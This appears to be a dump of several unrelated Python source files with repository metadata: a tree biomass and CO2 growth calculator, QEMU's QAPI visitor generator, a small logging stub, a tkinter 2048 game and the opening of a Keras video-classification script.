# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=0)
# else:
# if rounded:
# curr_ht = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=curr_ht)
# prev_ht = eqn(prev_age, a, b, c, d, e)
# if curr_age <= appsminage or prev_age < appsminage:
# prev_ht = AppsMin
# else:
# prev_ht = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=prev_ht)
#==============================================================================
print "curr_biomass", curr_biomass
print "prev_biomass", prev_biomass
# the results table sets the CO2 sequestration to the carbon stored in this minimum limiting case.
# not quite -- if prev_biomass fails (negative age e.g.), the calc blows up
# if curr_age >= appsmaxage:
# return (curr_biomass[0], curr_biomass[1], 0.0)
if abs(curr_biomass[0] - prev_biomass[0]) <= 1e-02:
return (curr_biomass[0], curr_biomass[1], curr_biomass[2])
# else:
# return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
else:
return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
def inv_age_calc(dbconn, speccode, region, age, comptype):
"""Compute dbh or height given age."""
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
currval = eqn(age, a, b, c, d, e)
return (currval, eqtype, AppsMin, AppsMax)
def biomasstoCO2(biomass0):
"""Compute CO2 equivalent for biomass value."""
return (biomass0 * biomass.carbon_fraction / biomass.roots) * biomass.co2_fraction
def growth_age_table(dbconn, speccode, region):
"""Print out table giving dbh/ht values for particular ages..."""
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region)
for age in range(0,151):
print age, eqn(age, a, b, c, d, e)
def growth_coeffs_min_max(dbconn, tol=1e-04):
"""Populate GrowCoeffsMinMax table with corresponding min and max ages to AppsMin and AppsMax"""
c = dbconn.cursor()
qstr = "SELECT DISTINCT Region, SpecCode FROM GrowCoeffs"
c.execute(qstr)
qall = c.fetchall()
specregions = filter(lambda x: x[0] != '', qall)
for specregion in specregions:
appstate = 'BeforeMin'
minage = 0
maxage = 500
for age in range(0, 500):
(currval, eqtype, AppsMin, AppsMax) = inv_age_calc(dbconn, specregion[1], specregion[0], age)
if appstate != 'SeekingMax':
if abs(currval - AppsMin ) < tol:
minage = age
appstate = 'FoundMin'
if appstate == 'FoundMin' and (currval > AppsMin):
appstate = 'SeekingMax'
else:
if abs(currval - AppsMax) < tol:
maxage = age
break
#print specregion[1], specregion[0], AppsMin, AppsMax, minage, maxage
qstr = "INSERT INTO GrowCoeffsMinMAX VALUES ('%s', '%s', %f, %f, %d, %d)" % (specregion[0], specregion[1], AppsMin, AppsMax, minage, maxage )
#print qstr
c.execute(qstr)
dbconn.commit()
"""A few records fail to get values assigned (i.e. stay at 0,500). I manually adjust these
using the GrowthResults table"""
def inv_age_calc2(dbconn, speccode, region, age):
"""Return both dbh and height as a function of age."""
qstr = "SELECT b.EqnName FROM SpeciesCodeList a, VolBioCoeffs b WHERE a.BioMassAssign = b.SpecCode AND a.SpeciesCode = '%s' AND a.Region = '%s'" % (speccode, region)
c = dbconn.cursor()
c.execute(qstr)
qresult = c.fetchone()
(eqn2) = qresult
minmaxtype = biomass.minmaxtypedict[eqn2[0]]
if minmaxtype == 'dbh':
comptype = 'd.b.h.'
else:
comptype = 'tree ht'
#print "eqn: ", eqn2[0], "minmaxtype: ", minmaxtype
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
#print "eqn: ", eqn, "eqtype: ", eqtype, "a: ", a, "b: ", b, "c: ", c, "d: ", d, "e: ", e
currval = eqn(age, a, b, c, d, e)
if currval < AppsMin:
currval = AppsMin
if currval > AppsMax:
currval = AppsMax
if comptype == 'd.b.h.':
(eqn2, eqtype2, eqstr2, a2, b2, c2, d2, e2, AppsMin2, AppsMax2) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
newval = eqn2(currval, a2, b2, c2, d2, e2)
newdbh = currval
newht = newval
else:
#(eqn2, eqtype2, eqstr2, a2, b2, c2, d2, e2, AppsMin2, AppsMax2) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
#newval = eqn2(currval, a2, b2, c2, d2, e2)
newht = currval
newdbh = None
return (newdbh, newht, eqtype, AppsMin, AppsMax)
| 47.225225 | 173 | 0.582869 |
cffdac8ff97bce692671550aaa1b020349950469 | 9,669 | py | Python | scripts/qapi/visit.py | nonomal/UTM | 758372318887710a74791ac4c6af175a0fe363d0 | [
"Apache-2.0"
] | 1 | 2022-02-17T04:51:18.000Z | 2022-02-17T04:51:18.000Z | scripts/qapi/visit.py | nonomal/UTM | 758372318887710a74791ac4c6af175a0fe363d0 | [
"Apache-2.0"
] | null | null | null | scripts/qapi/visit.py | nonomal/UTM | 758372318887710a74791ac4c6af175a0fe363d0 | [
"Apache-2.0"
] | 1 | 2020-02-23T04:35:10.000Z | 2020-02-23T04:35:10.000Z | """
QAPI visitor generator
Copyright IBM, Corp. 2011
Copyright (C) 2014-2018 Red Hat, Inc.
Authors:
Anthony Liguori <aliguori@us.ibm.com>
Michael Roth <mdroth@linux.vnet.ibm.com>
Markus Armbruster <armbru@redhat.com>
This work is licensed under the terms of the GNU GPL, version 2.
See the COPYING file in the top-level directory.
"""
from qapi.common import *
from qapi.gen import QAPISchemaModularCVisitor, ifcontext
from qapi.schema import QAPISchemaObjectType
def gen_visit_decl(name, scalar=False):
c_type = c_name(name) + ' *'
if not scalar:
c_type += '*'
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_type)sobj, Error **errp);
''',
c_name=c_name(name), c_type=c_type)
def gen_visit_members_decl(name):
return mcgen('''
bool visit_type_%(c_name)s_members(Visitor *v, %(c_name)s *obj, Error **errp);
''',
c_name=c_name(name))
def gen_visit_object_members(name, base, members, variants):
ret = mcgen('''
bool visit_type_%(c_name)s_members(Visitor *v, %(c_name)s *obj, Error **errp)
{
''',
c_name=c_name(name))
if base:
ret += mcgen('''
if (!visit_type_%(c_type)s_members(v, (%(c_type)s *)obj, errp)) {
return false;
}
''',
c_type=base.c_name())
for memb in members:
ret += gen_if(memb.ifcond)
if memb.optional:
ret += mcgen('''
if (visit_optional(v, "%(name)s", &obj->has_%(c_name)s)) {
''',
name=memb.name, c_name=c_name(memb.name))
push_indent()
ret += mcgen('''
if (!visit_type_%(c_type)s(v, "%(name)s", &obj->%(c_name)s, errp)) {
return false;
}
''',
c_type=memb.type.c_name(), name=memb.name,
c_name=c_name(memb.name))
if memb.optional:
pop_indent()
ret += mcgen('''
}
''')
ret += gen_endif(memb.ifcond)
if variants:
ret += mcgen('''
switch (obj->%(c_name)s) {
''',
c_name=c_name(variants.tag_member.name))
for var in variants.variants:
case_str = c_enum_const(variants.tag_member.type.name,
var.name,
variants.tag_member.type.prefix)
ret += gen_if(var.ifcond)
if var.type.name == 'q_empty':
# valid variant and nothing to do
ret += mcgen('''
case %(case)s:
break;
''',
case=case_str)
else:
ret += mcgen('''
case %(case)s:
return visit_type_%(c_type)s_members(v, &obj->u.%(c_name)s, errp);
''',
case=case_str,
c_type=var.type.c_name(), c_name=c_name(var.name))
ret += gen_endif(var.ifcond)
ret += mcgen('''
default:
abort();
}
''')
ret += mcgen('''
return true;
}
''')
return ret
def gen_visit_list(name, element_type):
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s **obj, Error **errp)
{
bool ok = false;
%(c_name)s *tail;
size_t size = sizeof(**obj);
if (!visit_start_list(v, name, (GenericList **)obj, size, errp)) {
return false;
}
for (tail = *obj; tail;
tail = (%(c_name)s *)visit_next_list(v, (GenericList *)tail, size)) {
if (!visit_type_%(c_elt_type)s(v, NULL, &tail->value, errp)) {
goto out_obj;
}
}
ok = visit_check_list(v, errp);
out_obj:
visit_end_list(v, (void **)obj);
if (!ok && visit_is_input(v)) {
qapi_free_%(c_name)s(*obj);
*obj = NULL;
}
return ok;
}
''',
c_name=c_name(name), c_elt_type=element_type.c_name())
def gen_visit_enum(name):
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s *obj, Error **errp)
{
int value = *obj;
bool ok = visit_type_enum(v, name, &value, &%(c_name)s_lookup, errp);
*obj = value;
return ok;
}
''',
c_name=c_name(name))
def gen_visit_alternate(name, variants):
ret = mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s **obj, Error **errp)
{
bool ok = false;
if (!visit_start_alternate(v, name, (GenericAlternate **)obj,
sizeof(**obj), errp)) {
return false;
}
if (!*obj) {
/* incomplete */
assert(visit_is_dealloc(v));
ok = true;
goto out_obj;
}
switch ((*obj)->type) {
''',
c_name=c_name(name))
for var in variants.variants:
ret += gen_if(var.ifcond)
ret += mcgen('''
case %(case)s:
''',
case=var.type.alternate_qtype())
if isinstance(var.type, QAPISchemaObjectType):
ret += mcgen('''
if (!visit_start_struct(v, name, NULL, 0, errp)) {
break;
}
if (visit_type_%(c_type)s_members(v, &(*obj)->u.%(c_name)s, errp)) {
ok = visit_check_struct(v, errp);
}
visit_end_struct(v, NULL);
''',
c_type=var.type.c_name(),
c_name=c_name(var.name))
else:
ret += mcgen('''
ok = visit_type_%(c_type)s(v, name, &(*obj)->u.%(c_name)s, errp);
''',
c_type=var.type.c_name(),
c_name=c_name(var.name))
ret += mcgen('''
break;
''')
ret += gen_endif(var.ifcond)
ret += mcgen('''
case QTYPE_NONE:
abort();
default:
assert(visit_is_input(v));
error_setg(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null",
"%(name)s");
/* Avoid passing invalid *obj to qapi_free_%(c_name)s() */
g_free(*obj);
*obj = NULL;
}
out_obj:
visit_end_alternate(v, (void **)obj);
if (!ok && visit_is_input(v)) {
qapi_free_%(c_name)s(*obj);
*obj = NULL;
}
return ok;
}
''',
name=name, c_name=c_name(name))
return ret
def gen_visit_object(name, base, members, variants):
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s **obj, Error **errp)
{
bool ok = false;
if (!visit_start_struct(v, name, (void **)obj, sizeof(%(c_name)s), errp)) {
return false;
}
if (!*obj) {
/* incomplete */
assert(visit_is_dealloc(v));
ok = true;
goto out_obj;
}
if (!visit_type_%(c_name)s_members(v, *obj, errp)) {
goto out_obj;
}
ok = visit_check_struct(v, errp);
out_obj:
visit_end_struct(v, (void **)obj);
if (!ok && visit_is_input(v)) {
qapi_free_%(c_name)s(*obj);
*obj = NULL;
}
return ok;
}
''',
c_name=c_name(name))
class QAPISchemaGenVisitVisitor(QAPISchemaModularCVisitor):
def __init__(self, prefix):
super().__init__(
prefix, 'qapi-visit', ' * Schema-defined QAPI visitors',
' * Built-in QAPI visitors', __doc__)
def _begin_system_module(self, name):
self._genc.preamble_add(mcgen('''
#include "qemu-compat.h"
#include "error.h"
#include "qapi-builtin-visit.h"
'''))
self._genh.preamble_add(mcgen('''
#include "visitor.h"
#include "qapi-builtin-types.h"
'''))
def _begin_user_module(self, name):
types = self._module_basename('qapi-types', name)
visit = self._module_basename('qapi-visit', name)
self._genc.preamble_add(mcgen('''
#include "qemu-compat.h"
#include "error.h"
#include "qerror.h"
#include "%(visit)s.h"
''',
visit=visit))
self._genh.preamble_add(mcgen('''
#include "qapi-builtin-visit.h"
#include "%(types)s.h"
''',
types=types))
def visit_enum_type(self, name, info, ifcond, features, members, prefix):
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_decl(name, scalar=True))
self._genc.add(gen_visit_enum(name))
def visit_array_type(self, name, info, ifcond, element_type):
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_decl(name))
self._genc.add(gen_visit_list(name, element_type))
def visit_object_type(self, name, info, ifcond, features,
base, members, variants):
# Nothing to do for the special empty builtin
if name == 'q_empty':
return
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_members_decl(name))
self._genc.add(gen_visit_object_members(name, base,
members, variants))
# TODO Worth changing the visitor signature, so we could
# directly use rather than repeat type.is_implicit()?
#if not name.startswith('q_'):
# only explicit types need an allocating visit
self._genh.add(gen_visit_decl(name))
self._genc.add(gen_visit_object(name, base, members, variants))
def visit_alternate_type(self, name, info, ifcond, features, variants):
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_decl(name))
self._genc.add(gen_visit_alternate(name, variants))
def gen_visit(schema, output_dir, prefix, opt_builtins):
vis = QAPISchemaGenVisitVisitor(prefix)
schema.visit(vis)
vis.write(output_dir, opt_builtins)
| 28.189504 | 88 | 0.555383 |
8ef462a63fe7c865f5be0ecc4a4eec880f4b343f | 732 | py | Python | src/main.py | Just-Joe/CreoMusic | 254c9ca418e8770786205b32afdd2b974e50192a | [
"Apache-2.0"
] | null | null | null | src/main.py | Just-Joe/CreoMusic | 254c9ca418e8770786205b32afdd2b974e50192a | [
"Apache-2.0"
] | null | null | null | src/main.py | Just-Joe/CreoMusic | 254c9ca418e8770786205b32afdd2b974e50192a | [
"Apache-2.0"
] | null | null | null | import time
import subprocess
import logging
# Initialise global logging
logpath = 'logs/CreoMusic.log'
log = None
def logger_init():
"""
Sets up logging process
"""
logger = logging.getLogger('creologger')
logger.setLevel(logging.DEBUG)
subprocess.call(['rm', logpath])
fh = logging.FileHandler(logpath)
form = logging.Formatter('%(asctime)s | %(message)s')
fh.setLevel(logging.DEBUG)
fh.setFormatter(form)
logger.addHandler(fh)
global log
log = logger
logger.info('Logger started.')
def main():
"""
Dispatched initialization procedures and launches the backend and interface
"""
logger_init()
log.critical('Starting CreoMusic!')
log.critical('Exiting CreoMusic!')
if __name__ == "__main__":
main()
| 19.263158 | 77 | 0.72541 |
0af5ed9f160855cd5aae5497952d00a75ee956dc | 16,305 | py | Python | 2048.py | wjthieme/Python-2048 | fa32e0ae6b5bb38de2f56f39d6ccfcc1e8b59605 | [
"MIT"
] | null | null | null | 2048.py | wjthieme/Python-2048 | fa32e0ae6b5bb38de2f56f39d6ccfcc1e8b59605 | [
"MIT"
] | null | null | null | 2048.py | wjthieme/Python-2048 | fa32e0ae6b5bb38de2f56f39d6ccfcc1e8b59605 | [
"MIT"
] | null | null | null | # 2048 by Mara Dekkers & Willem Thieme (copyright (c) 2017)
# LSC213 Computer Science II - Final assignment (All code is written by Mara and Willem)
import tkinter as tk # import the tkinter module as tk
import random as rand # import the random module as rand
def startGame(): # start a new game
global score, matrix # make sure we selected the global variables for score and matrix
matrix = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]] # set the matrix to contain zeros
score = 0 # set the score to 0
plaatsNummer() # place the first number in concordance with the 2048 game rules
plaatsNummer() # place the second number
drawScreen() # draw the screen
def openHelp(): # open the help screen and hide the main screen
screen.withdraw() # hide the main screen
screen2.deiconify() # show the help screen
def hideHelp(): # hide the help screen and open the main screen
screen2.withdraw() # hide the help screen
screen.deiconify() # show the main screen
def quitQuit(): # quit the application
screen.destroy() # destroy the main screen
screen2.destroy() # destroy the help screen
def plaatsNummer(): # place a number on the grid (either a 4 or a 2)
if len(vindNul()) == 0: return # check if there are still empty spaces on the board
randnum = rand.randint(1, 10) # get a random number from 1 to 10
vier = False # this variable will determine whether we will place a 4 or a 2.
if (randnum == 1): # one out of 10 times we will place a 4.
vier = True # set this variable to true so we know we are going to place a four
vakje = rand.choice(vindNul()) # find a random empty square
if vier: # if we decided to place a four
matrix[vakje[0]][vakje[1]] = 4 # place the four
else: # else
matrix[vakje[0]][vakje[1]] = 2 # place a two
def drawScreen(): # redraw the screen
canvas.delete("all") # clear the cavas
scoretext = "Score: " + str(score) # create a string for the score
canvas.create_text(240, 18, text=scoretext, font=('Helvetica', 24), fill='gray30') # create a text for the score
canvas.create_rectangle(35, 35, 445, 445, fill='ivory3', outline='ivory3') # creat the background
n = 0 # these three variable are to count which square we are currently evaluating
x = 0
y = 0
while n < 16:
outlinecolor = 'seashell4' # set the outline color
if matrix[y][x] == 0: # all these Ifs will set the square color for the different values.
squarecolor = 'ivory2'
elif matrix[y][x] == 2:
squarecolor = 'ivory'
elif matrix[y][x] == 4:
squarecolor = 'light yellow'
elif matrix[y][x] == 8:
squarecolor = 'sandy brown'
elif matrix[y][x] == 16:
squarecolor = 'coral'
elif matrix[y][x] == 32:
squarecolor = 'tomato'
elif matrix[y][x] == 64:
squarecolor = 'orange red'
elif matrix[y][x] == 128:
squarecolor = 'LightGoldenrod1'
elif matrix[y][x] == 256:
squarecolor = 'khaki'
elif matrix[y][x] == 512:
squarecolor = 'goldenrod1'
elif matrix[y][x] == 1024:
squarecolor = 'gold2'
elif matrix[y][x] == 2048:
squarecolor = 'orange2'
elif matrix[y][x] == 4096:
squarecolor = 'seagreen2'
elif matrix[y][x] == 8192:
squarecolor = 'seagreen3'
elif matrix[y][x] == 16384:
squarecolor = 'aquamarine2'
elif matrix[y][x] == 32768:
squarecolor = 'turquoise2'
elif matrix[y][x] == 65536:
squarecolor = 'turquoise3'
elif matrix[y][x] == 131072:
squarecolor = 'mediumpurple1'
canvas.create_rectangle(x * 100 + 45, y * 100 + 45, x * 100 + 135, y * 100 + 135, fill=squarecolor,
outline=squarecolor) # draw a square
if matrix[y][x] != 0: # set text color for the number in the squares.
if matrix[y][x] < 5:
textcolor = 'gray30'
else:
textcolor = 'white'
canvas.create_text(x * 100 + 90, y * 100 + 90, text=matrix[y][x], fill=textcolor,
font=('Helvetica', 36)) # write the text in the square
n += 1 # set our counter +1
x += 1 # set the x-coord +1
if x == 4: # if we're at the end of the row of the matrix we move down one row
x = 0
y += 1
if not (moveUpPossible()) and not (moveDownPossible()) and not (moveLeftPossible()) and not (
moveRightPossible()): # if there are no moves possible
canvas.create_text(240, 190, text="Game", font=('Helvetica', 64), fill='gray30') # set the game over text
canvas.create_text(240, 290, text="Over", font=('Helvetica', 64), fill='gray30') # ^^
def vindNul(): # find each square that doesn't have a block in it
nullen = [] # intialize variable nullen
x = 0 # set our coordinates to 0.
y = 0
for list in matrix: # our matrix is actually a list of lists so in order to run through each single item we must have two for loops.
for vakje in list: # this for loop runs through each single square
if vakje == 0: # if the value of the square is 0.
nullen.append([y, x]) # add the coordinates to the variable nullen
x += 1 # up the coordinates
y += 1 # up the y coordinate
x = 0 # set x back to 0 to start on the first square of the next row
return nullen # return the variable nullen
def vindNietNul(
omgekeerd=False): # find all the squares that do have a block in it (look at the comments for the function above)
nietNullen = [] # this function does pretty much the same as the previous one except that it returns all the squares that have a block in it
x = 0
y = 0
for list in matrix:
for vakje in list:
if vakje != 0:
nietNullen.append([y, x])
x += 1
y += 1
x = 0
if omgekeerd: # if we want the list of coordinates to be reversed we do that here.
nietNullen.reverse() # reverse the list of coordinates
return nietNullen
def addScore(number): # add a number to score
global score # make sure we selected the global score
score += number # add number to score
def up(index): # move a block upwards (nested function)
if (index[0] == 0): return # if the square is on the edge we can't move it upwards so we return.
if (matrix[index[0] - 1][index[1]] != 0): # check whether the square above is not a zero
if (matrix[index[0] - 1][index[1]] == matrix[index[0]][
index[1]]): # if the square above is the same as the square we are looking at.
addScore(matrix[index[0]][index[1]] * 2) # we add a number to the score
matrix[index[0] - 1][index[1]] += matrix[index[0] - 1][index[1]] # we add the two squares together
matrix[index[0]][index[1]] = 0 # and remove the initial square
return # exit the function because we have moved the square
if (matrix[index[0] - 1][index[1]] == 0): # check whether the square above is empty
matrix[index[0] - 1][index[1]] = matrix[index[0]][index[1]] # move the square one up
matrix[index[0]][index[1]] = 0 # remove the initial square
up([index[0] - 1, index[1]]) # check whether we can move the square up again.
def down(index): # move a block downwards (nested function) (look at the comments for the function above)
if (index[0] == len(matrix) - 1): return
if (matrix[index[0] + 1][index[1]] != 0):
if (matrix[index[0] + 1][index[1]] == matrix[index[0]][index[1]]):
addScore(matrix[index[0]][index[1]] * 2)
matrix[index[0] + 1][index[1]] += matrix[index[0] + 1][index[1]]
matrix[index[0]][index[1]] = 0
return
if (matrix[index[0] + 1][index[1]] == 0):
matrix[index[0] + 1][index[1]] = matrix[index[0]][index[1]]
matrix[index[0]][index[1]] = 0
down([index[0] + 1, index[1]])
def left(index): # move a block left (nested function) (look at the comments for the function above)
if (index[1] == 0): return
if (matrix[index[0]][index[1] - 1] != 0):
if (matrix[index[0]][index[1] - 1] == matrix[index[0]][index[1]]):
addScore(matrix[index[0]][index[1]] * 2)
matrix[index[0]][index[1] - 1] += matrix[index[0]][index[1] - 1]
matrix[index[0]][index[1]] = 0
return
if (matrix[index[0]][index[1] - 1] == 0):
matrix[index[0]][index[1] - 1] = matrix[index[0]][index[1]]
matrix[index[0]][index[1]] = 0
left([index[0], index[1] - 1])
def right(index): # move a block right (nested function) (look at the comments for the function above)
if (index[1] == len(matrix) - 1): return
if (matrix[index[0]][index[1] + 1] != 0):
if (matrix[index[0]][index[1] + 1] == matrix[index[0]][index[1]]):
addScore(matrix[index[0]][index[1]] * 2)
matrix[index[0]][index[1] + 1] += matrix[index[0]][index[1] + 1]
matrix[index[0]][index[1]] = 0
return
if (matrix[index[0]][index[1] + 1] == 0):
matrix[index[0]][index[1] + 1] = matrix[index[0]][index[1]]
matrix[index[0]][index[1]] = 0
right([index[0], index[1] + 1])
def moveUpPossible(): # find out if it is possible to move a block upwards
for index in vindNietNul(): # find all the squares and exectute the next piece for each square
if (index[0] == 0): continue # if the square is on the border: Continue
if (matrix[index[0] - 1][index[1]] == 0 or matrix[index[0] - 1][index[1]] == matrix[index[0]][
index[1]]): # if the square above is empty or the same as the square we are currently evaluating
return True # that means we can still move upwards so we return true.
return False # else when there is no move possible we return false.
def moveDownPossible(): # find out if it is possible to move a block downwards (look at the comments for the function above)
for index in vindNietNul(True):
if (index[0] == len(matrix) - 1): continue
if (matrix[index[0] + 1][index[1]] == 0 or matrix[index[0] + 1][index[1]] == matrix[index[0]][index[1]]):
return True
return False
def moveLeftPossible(): # find out if it is possible to move a block left (look at the comments for the function above)
for index in vindNietNul():
if (index[1] == 0): continue
if (matrix[index[0]][index[1] - 1] == 0 or matrix[index[0]][index[1] - 1] == matrix[index[0]][index[1]]):
return True
return False
def moveRightPossible(): # find out if it is possible to move a block right (look at the comments for the function above)
for index in vindNietNul(True):
if (index[1] == len(matrix) - 1): continue
if (matrix[index[0]][index[1] + 1] == 0 or matrix[index[0]][index[1] + 1] == matrix[index[0]][index[1]]):
return True
return False
def key(
event): # this function handles what happens when a key is pressed. (on windows the arrow keys don't work so you need to use the wasd.
if (event.char == '' or event.char == 'w'): # check whether the key that is pressed is a w or up arrow
if not (moveUpPossible()): return # if we can't move upwards we do nothing.
for index in vindNietNul(): # for each square that is currently on the board:
up(index) # we move it up.
elif (event.char == '' or event.char == 's'): # check whether the key that is pressed is a s or down arrow
if not (moveDownPossible()): return # if we can't move downwards we do nothing.
for index in vindNietNul(
True): # for each square that is currently on the board: (for moving down we reverse the list of coordinates because we want to evaluate the squares in a reversed order)
down(index) # we move it down.
elif (event.char == '' or event.char == 'a'): # check whether the key that is pressed is a a or left arrow
if not (moveLeftPossible()): return # if we can't move left we do nothing.
for index in vindNietNul(): # for each square that is currently on the board:
left(index) # we move it left.
elif (event.char == '' or event.char == 'd'): # check whether the key that is pressed is a d or right arrow
if not (moveRightPossible()): return # if we can't move right we do nothing.
for index in vindNietNul(
True): # for each square that is currently on the board: (for moving down we reverse the list of coordinates because we want to evaluate the squares in a reversed order)
right(index) # we move it right.
else: # if the button that is not an arrow key or wasd
return # then we do nothing.
plaatsNummer() # place a new number on the board
drawScreen() # redraw the screen on the gui
score = 0 # set the score to 0
matrix = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]] # set the matrix to contain zeros
screen = tk.Tk() # create a screen for the game
screen.wm_title("2048") # set the title of the screen
screen.bind("<Key>", key) # set the keylistener for the frame
screen.geometry('%dx%d+%d+%d' % (500, 500, (screen.winfo_screenwidth() / 2) - 250,
(screen.winfo_screenheight() / 2) - 300)) # set the position and size of the frame
screen.protocol('WM_DELETE_WINDOW', quitQuit) # set what happens when the window is closed
screen.attributes("-topmost", True) # set the window to be always on top
gameScherm = tk.Frame(screen, borderwidth=10) # create a frame which we will add the widgets to
gameScherm.pack() # pack the frame
canvas = tk.Canvas(gameScherm, width=500, height=450) # add a canvas to draw the board
canvas.pack(anchor='center') # pack the canvas
quitButton = tk.Button(gameScherm, text="Quit", bd=5, command=lambda: quitQuit()) # add a quit button
quitButton.pack(side='right') # pack the quit button
restartButton = tk.Button(gameScherm, text="Restart", bd=5, command=lambda: startGame()) # add a restart button
restartButton.pack(side='left') # pack the restart button
helpButton = tk.Button(gameScherm, text="Help", bd=5, command=lambda: openHelp()) # add a help button
helpButton.pack(anchor='center') # pack the help button
screen2 = tk.Tk() # create a second screen for the help window
screen2.wm_title("Help") # set the title
screen2.attributes("-topmost", True) # make sure the screen is always on top
screen2.geometry('%dx%d+%d+%d' % (
250, 105, (screen.winfo_screenwidth() / 2) - 125, (screen.winfo_screenheight() / 2) - 100)) # set the location and size
screen2.protocol('WM_DELETE_WINDOW', hideHelp) # set what happens when you close the window
screen2.configure(background="ivory2") # set the background color
screen2.withdraw() # hide the help button because we start on the main window
helpScherm = tk.Frame(screen2, borderwidth=10) # add a frame to the help screen
helpScherm.configure(background="ivory2") # set the background color
helpScherm.pack() # pack the frame
label = tk.Label(helpScherm, bd=5, font=('Helvetica', 14)) # add a label
label.configure(
text="Hi! Welcome to 2048. \n Move the arrows or the \"wasd\" keys. \n Swipe the numbers and get to 2048!") # set the helptext on the label
label.configure(background="ivory2", highlightcolor="ivory2", highlightbackground="ivory2") # set the background color
label.pack() # pack the label
quitHelpButton = tk.Button(helpScherm, text="Quit", bd=5, command=lambda: hideHelp()) # add a button to the help screen
quitHelpButton.configure(background="ivory2", highlightcolor="ivory2",
highlightbackground="ivory2") # set the background color
quitHelpButton.pack(anchor="s") # pack the button
startGame() # call the function start game
screen.mainloop() # call the method that starts the screen
screen2.mainloop() # call the method that starts the helpscreen. Remember, we've hidden this screen so it won't show up yet.
| 51.598101 | 186 | 0.621466 |
3593d9078bf13e8341efc0ec1435a514c9802103 | 1,059 | py | Python | test_station.py | Lab-Group-61/LG61-Flood-Warning | f4eac4f11c398c2c475d7eebe151c409c2c61942 | [
"MIT"
] | null | null | null | test_station.py | Lab-Group-61/LG61-Flood-Warning | f4eac4f11c398c2c475d7eebe151c409c2c61942 | [
"MIT"
] | null | null | null | test_station.py | Lab-Group-61/LG61-Flood-Warning | f4eac4f11c398c2c475d7eebe151c409c2c61942 | [
"MIT"
] | null | null | null | # Copyright (C) 2018 Garth N. Wells
#
# SPDX-License-Identifier: MIT
"""Unit test for the station submodule"""
from floodsystem.station import MonitoringStation, inconsistent_typical_range_stations
def test_create_monitoring_station():
# Create a station
s_id = "test-s-id"
m_id = "test-m-id"
label = "some station"
coord = (-2.0, 4.0)
trange = (2, 1) # Note the inconsistent range
river = "River X"
town = "My Town"
s = MonitoringStation(s_id, m_id, label, coord, trange, river, town)
assert s.station_id == s_id
assert s.measure_id == m_id
assert s.name == label
assert s.coord == coord
assert s.typical_range == trange
assert s.river == river
assert s.town == town
assert s.typical_range_consistent() == False # Test for Task 1F
assert s.relative_water_level() == None # Test for Task 2B
t = MonitoringStation("test-t-id", m_id, label, coord, trange, river, town)
a = [s,t]
assert(isinstance((inconsistent_typical_range_stations(a)),list)) == True # Test for Task 1F
| 32.090909 | 96 | 0.673277 |
7b8e2fcd09123dbcd6fffa3ebd2f30ab39bdcf66 | 17,719 | py | Python | code/YOLO101_1Resolusi_320x240_TrainCDV2.py | mlcv-lab/mr3dcapsnet | d0b37ca085073257b0c485210ec92a5c6e7d9bb6 | [
"Apache-2.0"
] | null | null | null | code/YOLO101_1Resolusi_320x240_TrainCDV2.py | mlcv-lab/mr3dcapsnet | d0b37ca085073257b0c485210ec92a5c6e7d9bb6 | [
"Apache-2.0"
] | null | null | null | code/YOLO101_1Resolusi_320x240_TrainCDV2.py | mlcv-lab/mr3dcapsnet | d0b37ca085073257b0c485210ec92a5c6e7d9bb6 | [
"Apache-2.0"
] | 1 | 2021-02-21T16:07:39.000Z | 2021-02-21T16:07:39.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 14 13:24:34 2017
@author: user
"""
#from keras.preprocessing.image import ImageDataGenerator
#from keras.models import Sequential
#from keras.layers.core import Dense, Dropout, Activation, Flatten, SpatialDropout3D, Merge
#from keras.layers.convolutional import Convolution3D, MaxPooling3D
from keras.optimizers import SGD, RMSprop, Adam
from keras.utils import np_utils, generic_utils
import os
import pandas as pd
import matplotlib
from keras.callbacks import ModelCheckpoint
import keras.callbacks
import matplotlib.pyplot as plt
import numpy as np
import cv2
from sklearn.cross_validation import train_test_split
from sklearn import cross_validation
import csv
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten, SpatialDropout3D
from keras.layers.convolutional import Convolution3D, MaxPooling3D
from sklearn.metrics import classification_report,confusion_matrix,cohen_kappa_score,roc_auc_score
#from keras.regularizers import l2, l1, WeightRegularizer
from keras.layers.normalization import BatchNormalization
def getLabelFromIdx(x):
return {
1 : 'ApplyEyeMakeup',
2 : 'ApplyLipstick',
3 : 'Archery',
4 : 'BabyCrawling',
5 : 'BalanceBeam',
6 : 'BandMarching',
7 : 'BaseballPitch',
8 : 'Basketball',
9 : 'BasketballDunk',
10 : 'BenchPress',
11 : 'Biking',
12 : 'Billiards',
13 : 'BlowDryHair',
